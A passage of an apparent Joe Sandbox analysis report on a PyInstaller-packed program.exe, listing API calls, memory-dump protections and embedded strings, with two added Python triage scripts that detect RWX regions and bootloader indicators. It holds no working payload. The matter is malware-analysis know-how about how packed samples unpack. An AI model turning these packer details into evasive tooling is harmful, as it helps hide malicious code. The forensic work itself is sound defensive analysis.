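    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK, WRITE_MASK = 0xF0, 0xCC   # bits of the constants above that imply X / W

DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<round>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})"
    r"(?:\.[0-9A-F]{8}){3}\.sdmp"
)
SOURCE_RE = re.compile(r"Source File:\s*(?P<dump>\S+?\.sdmp),\s*Offset:\s*(?P<base>[0-9A-F]{16})")
ASSOC_RE = re.compile(r"Associated:\s*(?P<dump>\S+?\.sdmp)")
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<lib>[A-Za-z0-9]+)(?:\(.*?\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{16})"
)

# Constructed sample in the shape of the report lines (two modules, four API refs).
SAMPLE = """\
• _get_daylight.LIBCMT ref: 00007FF6B7525EAA
  • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22), ref: 00007FF6B751A95E
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
"""


def parse_dump_name(name):
    """Split an .sdmp file name into its fields and decode the (assumed) protection value."""
    m = DUMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    prot = int(m["prot"], 16)
    return {
        "process": m["proc"],
        "dump_id": m["dumpid"],
        "address": int(m["addr"], 16),
        "protection": prot,
        "protection_name": PAGE_PROTECT.get(prot, f"UNKNOWN(0x{prot:X})"),
        "executable": bool(prot & EXEC_MASK),
        "writable": bool(prot & WRITE_MASK),
    }


def parse_report(text):
    """Return ({image base: [dump descriptors]}, [API ref dicts]) from report text."""
    modules = defaultdict(list)
    refs = []
    current_base = None          # "Associated" lines belong to the preceding "Source File"
    for raw in text.splitlines():
        line = raw.strip()
        if (m := SOURCE_RE.search(line)):
            current_base = int(m["base"], 16)
            modules[current_base].append(parse_dump_name(m["dump"]))
        elif (m := ASSOC_RE.search(line)):
            if current_base is not None:
                modules[current_base].append(parse_dump_name(m["dump"]))
        elif (m := API_RE.search(line)):
            refs.append({"api": m["api"], "lib": m["lib"], "ref": int(m["ref"], 16),
                         "subcall": "Part of subcall" in line})
    return dict(modules), refs


def module_for(address, modules):
    """Image base most plausibly owning `address`: the nearest base at or below it."""
    below = [base for base in modules if base <= address]
    return max(below) if below else None


def rwx_dumps(modules):
    """Dump addresses recorded as both executable and writable, sorted."""
    return sorted(d["address"] for dumps in modules.values() for d in dumps
                  if d["executable"] and d["writable"])


def attribute_refs(text):
    """(api, library, call-site address, owning image base) for every API ref in `text`."""
    modules, refs = parse_report(text)
    return [(r["api"], r["lib"], r["ref"], module_for(r["ref"], modules)) for r in refs]


if __name__ == "__main__":
    mods, _ = parse_report(SAMPLE)
    for base, dumps in sorted(mods.items()):
        print(f"module {base:#018x}")
        for d in dumps:
            print(f"  {d['address']:#018x}  {d['protection_name']}")
    print("RWX dumps:", [f"{a:#x}" for a in rwx_dumps(mods)])
    for api, lib, ref, base in attribute_refs(SAMPLE):
        print(f"{api}.{lib} at {ref:#x} -> module {base:#x}")
```

Run against the records above, the decode is consistent with what a normally mapped PE looks like: the main image's code dump at 00007FF6B7501000 carries 00000020 (PAGE_EXECUTE_READ) and its data dumps 00000004 (PAGE_READWRITE), while the code dumps of the module based at 00007FFE00760000 carry 00000040, which the script lists as executable and writable. Treat that as a cue to check how that module was mapped, not as a finding: the protection reading is an assumption, and PyInstaller-packed samples load their bundled DLLs in ways that can produce such regions legitimately.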
APIs
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505852
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505889
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750589B
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058B4
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058C6
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058DF
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058F1
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750590D
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750591F
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750593B
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750594D
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505969
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750597B
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505997
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059A9
• GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059C5
• GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059D7
Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 51059412cc8c27bda031adb8049a171a26fb45d4a4ab3af1fd8e4184feb329f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2022C367A0DB0792FB56DB5DA824AB423B0FF04789F645039CB5E822B1FF3CB5589244
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: afbf8e44049606493b6a61ad48ef1a32b219ed5e998c9ce3becdb61ddd17fc57
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: 9202E66AE0DB0B91FE169B5CE8149B423B5BF04789F540439CB6E822B4FF3CB55AD250

APIs
  • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B75086B7,?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B750822C
  • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction ID: 64c9254f4cc18c1062e46c0276ede67bee28ea1b66b377b9b023a1583293e9f1
• Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
• Instruction Fuzzy Hash: 24519313A2CA8781FA619B2DE851AFA63A0AF94788F444435DB4ED36F5EE3CF5048740

Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
• Instruction ID: 1c666878ca6cd65b34c36de1c7d6d3058427205002bf00e49484db3ad9b5a93f
• Opcode Fuzzy Hash: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
• Instruction Fuzzy Hash: FD519D63B0C64782EA10AB6994001B963A0BF84798F844535EF4CC7BF6EE3CF685C301

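Analyst note on the four program.exe functions above: the two routines that loop over GetProcAddress/GetLastError carry the string "Failed to get address for %hs" together with the full CPython embedding API (PyConfig_*, Py_PreInitialize, Py_InitializeFromConfig, PyMarshal_ReadObjectFromString) and the Tcl/Tk API, the third handles a "runtime-tmpdir" and the fourth reports "Failed to extract %s" errors around fopen/fread/fseek. Taken together these string sets are consistent with a PyInstaller-style bootloader that resolves an embedded interpreter at run time and unpacks an archive to a temporary directory, which is why the Python-level payload is not visible in the static strings of the PE. The script below is an added triage example written for this report, not Joe Sandbox output and not code from the sample: it pulls printable strings from a binary, matches them against the indicator sets the report lists, and looks for the CArchive cookie. The "MEI" magic bytes and the CPython 3.8 cut-off for the PyConfig API are assumptions taken from PyInstaller and CPython documentation, not facts shown in this report, and SAMPLE_BLOB is constructed input.

```python
"""Triage helper: flag PyInstaller-bootloader indicators in a raw binary.

Added example for this report. Python C-API, Tcl/Tk and LOADER strings come
from the function summaries above; MEI_MAGIC and the 3.8 cut-off are
assumptions from PyInstaller / CPython docs, not from the report.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Run-time resolved CPython symbols listed in the report's first function.
PYTHON_CAPI = {
    "PyConfig_InitIsolatedConfig", "PyConfig_Read", "PyConfig_SetString",
    "Py_PreInitialize", "Py_InitializeFromConfig", "Py_Finalize",
    "PyMarshal_ReadObjectFromString", "PyImport_ExecCodeModule",
    "PyRun_SimpleStringFlags", "PyEval_EvalCode",
}
# PEP 587 initialisation API (assumption: only present in CPython >= 3.8).
PEP587_APIS = {"PyConfig_InitIsolatedConfig", "PyConfig_Read",
               "Py_PreInitialize", "Py_InitializeFromConfig"}
# Tcl/Tk symbols listed in the report's second function.
TCL_TK = {"Tcl_CreateInterp", "Tcl_Init", "Tcl_EvalFile",
          "Tk_Init", "Tk_GetNumMainWindows"}
# Format strings are matched by prefix so %s / %ls / %hs placeholders are irrelevant.
LOADER_PREFIXES = ("LOADER: ", "Failed to extract ", "Failed to get address for ")
# Assumption: PyInstaller CArchive cookie magic, not shown in the report.
MEI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


@dataclass
class Findings:
    python_api: set[str]
    tcl_tk: set[str]
    loader_msgs: list[str]
    cookie_offset: int | None


def ascii_strings(blob: bytes, min_len: int = 6) -> list[str]:
    """Printable-ASCII runs of at least min_len bytes, like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def classify(blob: bytes) -> Findings:
    """Collect indicator hits; import names are stand-alone strings in the PE."""
    found = set(ascii_strings(blob))
    loader = sorted(s for s in found if s.startswith(LOADER_PREFIXES))
    idx = blob.rfind(MEI_MAGIC)          # cookie sits near the end of the file
    return Findings(found & PYTHON_CAPI, found & TCL_TK, loader,
                    None if idx < 0 else idx)


def verdict(f: Findings) -> str:
    """Coarse label: require loader messages *and* several run-time Python APIs."""
    if len(f.loader_msgs) >= 2 and len(f.python_api) >= 3:
        label = "pyinstaller-bootloader"
        if f.python_api & PEP587_APIS:
            label += " (CPython>=3.8)"
        if f.tcl_tk:
            label += " +tk"
        return label
    return "no-pyinstaller-indicators"


# Constructed sample, not the real program.exe: indicator strings separated by
# NULs and a fake CArchive cookie appended after some padding.
SAMPLE_BLOB = b"\x00".join([
    b"MZ\x90\x00", b"Failed to get address for %hs", b"GetProcAddress",
    b"PyConfig_InitIsolatedConfig", b"PyConfig_Read", b"Py_PreInitialize",
    b"Py_InitializeFromConfig", b"PyMarshal_ReadObjectFromString",
    b"Tcl_CreateInterp", b"Tk_Init",
    b"LOADER: failed to expand environment variables in the runtime-tmpdir.",
    b"Failed to extract %s: failed to open archive file!",
    b"\x90\x90\x90" + MEI_MAGIC + b"\x00" * 16,
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    f = classify(data)
    print(verdict(f))
    print("loader messages:", *f.loader_msgs, sep="\n  ")
    print("CArchive cookie at:", f.cookie_offset)
```

Run it against the extracted PE (`python triage.py program.exe`) to confirm the packing before spending time in IDA on the bootloader; the interesting logic is in the archive's compiled Python, so the next step is to carve the CArchive at the reported cookie offset rather than to disassemble further.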
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007B6570
• String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
• API String ID: 4069847057-1099454403
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID:
• String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
• API String ID: 0-3733955532
APIs
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFE0133B1C3
• 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFE0133B2A4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
• API String ID: 4225454184-875588658
APIs
Strings
• Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFE013578ED
• Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFE0135790F
• UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFE01357B14
• Cannot add a PRIMARY KEY column, xrefs: 00007FFE01357881
• SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFE013578F7, 00007FFE01357973, 00007FFE01357A81
• Cannot add a UNIQUE column, xrefs: 00007FFE0135789C
• SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFE01357C5C
• Cannot add a column with non-constant default, xrefs: 00007FFE01357969
• cannot add a STORED column, xrefs: 00007FFE01357A72
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
• API String ID: 4225454184-200680935
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
• API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 22ad40ebae3de3366863d30a60ff3b0a44f7f7b56b0eb5529f86f249ebe4b085
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1051E726608BA186D6349F36E4581BAB7A1F798B65F004125EFDE836A4EF3CD085DB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 5366563b7c7873b22ac9c7ec1e089b531d78b2e5d599c86f239c1fcb5f5fc67b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B219223B0CA4282EB458B7EE8545B96361FF88B94F584235DB6DC33F4EE2CE5918341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
